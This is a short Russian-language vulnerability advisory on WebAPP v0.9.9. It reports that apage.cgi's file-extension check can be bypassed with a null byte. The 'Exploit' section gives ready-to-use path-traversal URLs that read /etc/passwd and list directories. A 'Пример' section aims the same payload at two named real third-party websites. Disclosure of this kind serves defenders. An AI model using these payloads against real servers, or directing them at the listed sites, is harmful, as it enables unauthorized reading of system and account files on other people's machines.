Просмотр файлов и директорий в WebAPP Web Automated Perl Portal System v0.9.9.

Software / Application — WebAPP v0.9.9.
Problem-Type — удаленная
Vulnerability — возможность чтения файлов и просмотр каталогов.
Vendor — http://www.web-app.org
Risk / Severity — средний
Platforms — *.nix
Details / DESCRIPTION — Скрипт apage.cgi выполняет проверку на расширение открываемых файлов, но при вставке
«null-byte poison» отсекает расширение html, позволяя читать файлы и просматривать каталоги.

Exploit:

http://www.xxx.com/cgi-bin/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html
http://www.xxx.com/mods/apage/apage.cgi?f= ../../../../../../../../../%00.html

Пример:

http://www.feeed.net/cgi-bin/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html
http://www.fif.com.mx/fif/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html

durito [durito@mail.ru] LwB Security Team
[lwb57.org]
Copyright 2002-2005 by LwB Security Team. All rights reserved.

Оставить мнение